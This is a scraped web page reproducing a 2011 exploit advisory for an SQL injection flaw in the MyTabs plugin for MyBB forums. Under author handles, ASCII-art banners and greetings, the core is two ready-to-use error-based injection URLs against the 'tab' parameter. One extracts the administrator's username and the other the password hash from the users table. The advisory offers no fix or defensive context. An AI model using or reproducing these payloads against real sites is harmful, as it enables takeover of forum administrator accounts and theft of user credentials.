扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 |
===================================================================== MyBB 0day \ MyTabs (plugin) SQL injection vulnerability ===================================================================== # Exploit title :MyBB 0day \ MyTabs (plugin) SQL injection vulnerability. # Author: AutoRUN & dR.sqL # Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com # Date : 01 \ 08 \ 2011 # Tested on : Windows XP , Linux # Category : web apps # Vulnerable Software Link : http://mods.mybb.com/view/mytabs # Google dork : Use your mind kid ^_^ ! Vulnerability : $~ http://localhost/mybbpath/index.php?tab=[SQLi] --------------------------------------- # ~ Expl0itation ~# --------------------------------------- $~ Get the administrator's username (usually it has uid=1) ~ http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- - $~ Get the administrator's password ~ http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- - _ ______ _ _ _ _ _ _____ / \_ _| |_ ___ |_ \| | | | \ | | __ _ _ __ __| | __| |_ \ _____ _| | / _ \| | | | __/ _ \| |_) | | | |\| |/ _<code> | '_ \ / _</code> |/ _<code> | |_) | / __|/ _</code> | | / ___ \ |_| | |_ (_) |_ <| |_| | |\| | (_| | | | | (_| | | (_| |_ < _\__ \ (_| | |___ /_/ \_\__,_|\__\___/|_| \_\\___/|_| \_|\__,_|_| |_|\__,_|\__,_|_| \_(_)___/\__, |_____| |_| # Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends. _____ ________ __ _ _ _ |_ \ _ __ ____ ___| | |___ \| __ ) / \| | |__ __ _ _ __ (_) __ _ _ __ | | | |_) | '__/ _ \| | | |/ _<code> | __) |_ \/ _ \ | | '_ \ / _</code> | '_ \| |/ _` | '_ \| | |__/| | | (_) | |_| | (_| |/ __/| |_) |/ ___ \| | |_) | (_| | | | | | (_| | | | | |_| |_| |_|\___/ \__,_|\__,_| |_____|____//_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_) # 2011 |
体验盒子
